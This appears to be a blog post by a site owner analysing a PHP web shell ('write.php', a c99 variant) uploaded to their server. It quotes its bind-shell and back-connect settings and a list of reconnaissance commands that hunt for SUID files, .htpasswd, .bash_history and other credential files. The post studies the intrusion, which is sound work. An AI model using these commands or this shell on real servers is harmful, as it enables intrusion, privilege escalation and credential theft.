write.php by MakeBuy source code

On Dec 31, 2007 a set of files were uploaded to my website. Here are highlights:

• is written in PHP
• filename is write.php
• has code to see lots of details about a localhost it lives on,
• is functional on linux/unix OS,
• sets a cookie on remote machines,
• can email info to someone,
• does a bunch of possibly evil things using MySQL
• and is web form controlled.

Particularly interesting code snippets are shown here (forgive the weird formatting for blogspot) :

# Home page: http://ccteam.ru
$bindport_pass = "c99"; 
$bindport_port = "31373"; 
$bc_port = "31373"; 
$datapipe_localport = "8081"; 
$log_email = "oon.boy@gmail.com";
if (!$win)
{
    $cmdaliases = array(
        array(
"------------ ls -la ------------------",
"ls -la"
                 ),
        array(
"find all suid files", 
"find / -type f -perm -04000 -ls"
                  ),
        array(
"find suid files in current dir",
"find . -type f -perm -04000 -ls"
                  ),
        array(
 "find all sgid files", 
 "find / -type f -perm -02000 -ls"
                  ),
        array(
"find sgid files in current dir", 
 "find . -type f -perm -02000 -ls"
                   ),
        array(
 "find config.inc.php files",
 "find / -type f -name config.inc.php"
                  ),
        array(
"find config* files", 
"find / -type f -name \"config*\""
                  ),
        array(
"find config* files in current dir", 
 "find . -type f -name \"config*\""),
        array(
 "find all writable folders and files", 
  "find / -perm -2 -ls"
                  ),
        array(
 "find all writable folders and files in current dir", 
"find . -perm -2 -ls"
                  ),
        array(
"find all service.pwd files", 
 "find / -type f -name service.pwd"
                  ),
        array(
"find service.pwd files in current dir",
"find . -type f -name service.pwd"),
        array(
"find all .htpasswd files",
"find / -type f -name .htpasswd"
                  ),
        array(
"find .htpasswd files in current dir",
"find . -type f -name .htpasswd"
                   ),
        array( 
"find all .bash_history files",
"find / -type f -name .bash_history"
                    ),
        array(
"find .bash_history files in current dir",
"find . -type f -name .bash_history"
                    ),
        array(
"find all .fetchmailrc files", 
 "find / -type f -name .fetchmailrc"
                   ),
        array(
"find .fetchmailrc files in current dir", 
"find . -type f -name .fetchmailrc"
                  ),
        array(
"list file attributes on a Linux second extended file system", 
"lsattr -va"
                  ),
        array(
"show opened ports",
"netstat -an | grep -i listen"
                   )
    );
}

I've saved the code as a JPG which can be easily read. You can click on the embedded images below to go to the JPG's, then download by clicking on link to the right of the image.